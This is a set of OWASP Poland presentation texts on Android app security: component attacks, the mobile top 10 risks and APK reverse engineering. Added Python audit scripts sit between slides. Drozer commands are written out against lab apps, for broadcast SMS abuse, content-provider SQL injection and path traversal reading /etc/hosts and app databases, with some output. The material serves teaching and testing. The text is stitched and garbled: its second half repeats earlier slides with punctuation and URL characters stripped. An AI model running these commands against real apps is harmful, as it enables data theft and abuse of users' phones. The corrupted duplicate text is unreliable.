// GoatDroid's SendSMSNowReceiver; 'context' is a field of the enclosing receiver class.
// The receiver has an intent-filter and no permission, so it is exported and the
// phoneNumber and message extras come from whoever sent the broadcast.
public void onReceive(Context arg0, Intent arg1) {
    context = arg0;
    SmsManager sms = SmsManager.getDefault();
    Bundle bundle = arg1.getExtras();
    sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
    Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
}
Broadcast receivers attacks
run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
General defenses for App Components
Applies to all above-mentioned items:
• Setting the android:exported attribute to false (only components running under the same user ID as the current app will be able to access the activity)
• Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
References
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers
• http://yinzhicao.org/courses/f15/cse343443/slides/mobilesecurity.pdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5
• https://manifestsecurity.com/android-application-security-part-8
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to give you basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in the data stores on the device in an insecure (plain text or reversible encoding) format
Insecure data storage – what to look for
• Look for any sensitive information in:
  – SQLite databases (local)
  – XML data stores
  – Plain text configuration files
  – Cookie stores
  – SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the SD card before and after installing the application
• Analyze package files at different stages:
adb pull /data/data/<apk_package_name>
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted and world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use the setStorageEncryption method)
• For databases, consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences are NOT MODE_WORLD_READABLE
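An added Python triage script (not from the presentation) for the "how to find" steps and the MODE_WORLD_READABLE check above: it reads an `adb shell ls -l` listing for files readable or writable by other UIDs, and walks a pulled `/data/data/<package>` copy for credential-looking values stored in plain text. The listing and the file tree are constructed samples; the permission check uses the on-device listing because `adb pull` does not preserve mode bits on the host copy.

```python
import os
import re
import tempfile

# Matches password=..., "token": "...", <string name="password">... in any
# text-ish file; the value must start with a non-space, non-'<' character so an
# empty XML element is not reported. A heuristic, not an exhaustive scanner.
SECRET_RE = re.compile(
    rb'(?i)(password|passwd|secret|token|api_?key)["\']?\s*[=:>]\s*["\']?[^\s<"\']')


def world_readable_from_ls(ls_output):
    """Parse 'adb shell ls -l' lines (toolbox format: mode owner group size
    date time name) and report files whose 'other' bits allow read or write."""
    findings = []
    for line in ls_output.splitlines():
        fields = line.split()
        if len(fields) < 7 or not fields[0].startswith("-"):
            continue                      # skip blanks and directories
        mode, name = fields[0], fields[-1]
        if mode[7] == "r":
            findings.append(("world-readable", name))
        if mode[8] == "w":
            findings.append(("world-writable", name))
    return findings


def find_plaintext_secrets(root):
    """Walk a pulled /data/data/<package> tree and return the files whose first
    64 KiB contain a credential-looking assignment, as sorted relative paths."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                head = fh.read(65536)
            if SECRET_RE.search(head):
                findings.append(os.path.relpath(path, root).replace(os.sep, "/"))
    return sorted(findings)


# Constructed sample listing (paths prefixed with their directory for
# readability) and a tiny app-data tree; neither is real app content.
SAMPLE_LS = """\
-rw-rw-r-- u0_a72   u0_a72        512 2016-02-24 10:00 shared_prefs/creds.xml
-rw------- u0_a72   u0_a72      24576 2016-02-24 10:00 databases/app.db
-rw-rw-rw- u0_a72   u0_a72        128 2016-02-24 10:00 files/config.json
"""


def make_demo_app_dir():
    root = tempfile.mkdtemp(prefix="appdata_")
    samples = {
        "shared_prefs/creds.xml": b'<map><string name="password">hunter2</string></map>\n',
        "files/config.json": b'{"token": "abc123", "ttl": 60}\n',
        "files/empty.xml": b'<map><string name="password"></string></map>\n',
        "databases/app.db": b"SQLite format 3\x00" + b"\x00" * 64,
    }
    for rel, content in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    print(world_readable_from_ls(SAMPLE_LS))
    print(find_plaintext_secrets(make_demo_app_dir()))
```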
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or it does so incorrectly
What do you mean, "incorrectly"?
• Insecure implementations are:
  – Using known weak cipher/protocol versions (e.g. SSLv2/SSLv3, RC4)
  – Securing only part of the communication (e.g. only authentication)
  – Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the side of the browser
• It is done by a "chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• The expected X.509 certificate or public key is embedded in the source code:
if (presented_cert == pinned_cert)
    Start_connection()
else
    Drop_connection()
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid: mallodroid.py -f AppToCheck.apk -d javaout
• Look for end-point implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest for a public domain):
sslyze --regular www.example.com:443
Insufficient transport layer protection - example
Insufficient transport layer protection - few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage is about the developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakage
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB:
adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what is it
• Simple words definition: if you're able to bypass authentication and/or leverage your privileges then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
• For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server side whenever possible
• Persistent authentication ("Remember Me") functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not enabled by default.
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…):
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if the application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the passwords to decrypt it in code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on a device. Use password-based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from:
  – Another application via intent/content provider
  – Shared file
  – Server response
  – Third-party website
Client side injection – what to inject
• SQL injection into the local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, running a new activity, etc.) via special objects called Intents:
Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
// or, an implicit request for the camera app:
Intent j = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
dz> run app.package.manifest -a <package_name>
dz> run app.activity.info -a <package_name>
dz> run app.service.info --permission null -a <package_name>
dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm" prefix allows remote installation of ANY application, while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using Intent filters. Even if the Activity has the attribute exported="false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party, or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
  – Verify if a session expires (copy a cookie and try to use it after 30 minutes)
  – Verify if a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
  – Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should it REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
- http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
• Invalidate the session on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
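As an added example, not from the presentation, a minimal server-side session store that implements the four mitigations above in Python: high-entropy tokens from the OS CSPRNG (stored only as hashes, so a leaked table yields no usable sessions), idle expiry matching the 30-minute re-use check, explicit invalidation, and token rotation whenever the authentication state changes. `FakeClock` is a test aid that replaces sleeping.

```python
import hashlib
import secrets
import time

IDLE_TIMEOUT = 30 * 60   # the 30-minute re-use check from the slide


class FakeClock:
    """Test aid: a clock the demo can advance instead of sleeping."""

    def __init__(self, start=1_000_000.0):
        self.now = start

    def __call__(self):
        return self.now


class SessionStore:
    """Server-side session table. Tokens are 256-bit random strings; only
    their SHA-256 is kept, so a dump of the table does not yield live sessions."""

    def __init__(self, clock=time.time, idle_timeout=IDLE_TIMEOUT):
        self._clock = clock
        self._idle_timeout = idle_timeout
        self._sessions = {}   # sha256(token) -> {"user": ..., "last_seen": ...}

    @staticmethod
    def _key(token):
        return hashlib.sha256(token.encode("ascii")).hexdigest()

    def create(self, user):
        token = secrets.token_urlsafe(32)   # OS CSPRNG; never a device ID or counter
        self._sessions[self._key(token)] = {"user": user, "last_seen": self._clock()}
        return token

    def resolve(self, token):
        """Return the user for a live token, else None; idle tokens are destroyed."""
        entry = self._sessions.get(self._key(token))
        if entry is None:
            return None
        now = self._clock()
        if now - entry["last_seen"] > self._idle_timeout:
            self.invalidate(token)
            return None
        entry["last_seen"] = now
        return entry["user"]

    def invalidate(self, token):
        self._sessions.pop(self._key(token), None)

    def on_auth_change(self, old_token, new_user):
        """Login, logout or privilege change: destroy the old session and hand out
        a fresh token, so a token captured before the change is useless after it."""
        self.invalidate(old_token)
        return self.create(new_user)

    def live_count(self):
        return len(self._sessions)


if __name__ == "__main__":
    clock = FakeClock()
    store = SessionStore(clock=clock)
    tok = store.create("alice")
    print(store.resolve(tok))                 # alice
    clock.now += 31 * 60
    print(store.resolve(tok))                 # None: expired after 30 minutes idle
    tok = store.create("alice")
    new_tok = store.on_auth_change(tok, "bob")
    print(store.resolve(tok), store.resolve(new_tok))   # None bob
```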
Thank you
pawelrzepaoutlookcom
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security
• https://mobilesecuritywiki.com
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone:
  – APKOptic
  – Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling – high level – Java code
• Disassembling – low level – assembly code
• Why disassembling and not decompiling?
Decompiling
DEX → JAR → JAVA
JAR → DEX / JAVA
Decompiling - Dex2Jar
• dex2jar
  – Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – Allows the use of any existing Java decompiler with the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
  – Closed-source Java decompiler
  – Combined with dex2jar, you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → SMALI
Disassembling
• Apktool
  – Open-source Java tool for reverse-engineering Android apps
  – Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:
java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: Decompiling with Luyten
Demo: Modify Smali Files
Demo
Activity components demo
Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface. Other components can bind to a Service, which lets the binder invoke methods that are declared in the target Service's interface. Intents are used to start and bind to Services.
Example: playing music or downloading a file
Services attacks
Although services generally don't seem dangerous, they could potentially perform sensitive operations.
To attack a service one needs interaction (it must be exported, or respond to/accept input from message formats like intents, files, or the network stack).
Services attacks
Typical attacks: Denial of Service and Information Leakage
• Find exported services
• Launch them one-by-one with logcat to check for sensitive info
• Fire off intents and wait for it
Content providers
A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: using content providers, any app can read SMS from the built-in SMS app's repository on our device
Content providers
• What info can they hold?
  – User's phone numbers
  – Passwords
  – SMS
• And one of the main problems is, again, permissions:
run app.provider.info --permission null
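An added example (not GoatDroid's, nor drozer's code) that serves the "General defenses for App Components" slide as well as the "find exported services" step and the `--permission null` provider check above: a Python audit of AndroidManifest.xml that lists every component other apps can reach without a permission guard, applying the platform's pre-API-31 export defaults. The manifest is constructed around the GoatDroid SendSMSNowReceiver shown earlier; every other component name in it is invented for this example.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")

# Constructed manifest modelled on the GoatDroid receiver; all component names
# other than SendSMSNowReceiver are made up for this example.
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="org.owasp.goatdroid.fourgoats">
  <uses-sdk android:minSdkVersion="15" />
  <uses-permission android:name="android.permission.SEND_SMS" />
  <application android:label="FourGoats">
    <activity android:name=".activities.Main">
      <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
      </intent-filter>
    </activity>
    <receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
      <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
      </intent-filter>
    </receiver>
    <receiver android:name=".broadcastreceivers.InternalReceiver" android:exported="false">
      <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
      </intent-filter>
    </receiver>
    <service android:name=".services.LocationService" android:exported="true"
             android:permission="org.owasp.goatdroid.fourgoats.permission.LOCATION" />
    <provider android:name=".providers.BackupProvider"
              android:authorities="org.owasp.goatdroid.fourgoats.backup" />
  </application>
</manifest>
"""


def _attr(elem, name):
    """Read an attribute from the android: namespace."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def is_exported(elem, min_sdk):
    """Reproduce the platform default that bites most apps: an explicit
    android:exported wins; otherwise activities, services and receivers are
    exported exactly when they declare an <intent-filter>, and providers are
    exported when minSdkVersion is below 17."""
    explicit = _attr(elem, "exported")
    if explicit is not None:
        return explicit.strip().lower() == "true"
    if elem.tag == "provider":
        return min_sdk < 17
    return elem.find("intent-filter") is not None


def audit_manifest(xml_text):
    """Return (tag, name) for every exported component that no permission
    guards, in document order; this is the set drozer's '--permission null'
    filters show, computed from the manifest alone."""
    root = ET.fromstring(xml_text)
    sdk = root.find("uses-sdk")
    min_sdk = int(_attr(sdk, "minSdkVersion") or 1) if sdk is not None else 1
    findings = []
    for elem in root.iter():
        if elem.tag not in COMPONENT_TAGS or not is_exported(elem, min_sdk):
            continue
        guards = (_attr(elem, "permission"), _attr(elem, "readPermission"),
                  _attr(elem, "writePermission"))
        if not any(guards):
            findings.append((elem.tag, _attr(elem, "name")))
    return findings


if __name__ == "__main__":
    for tag, name in audit_manifest(SAMPLE_MANIFEST):
        # The launcher activity is expected here; the receiver and the provider
        # are the ones that need android:exported="false" or a custom permission.
        print("%-9s %s" % (tag, name))
```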
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
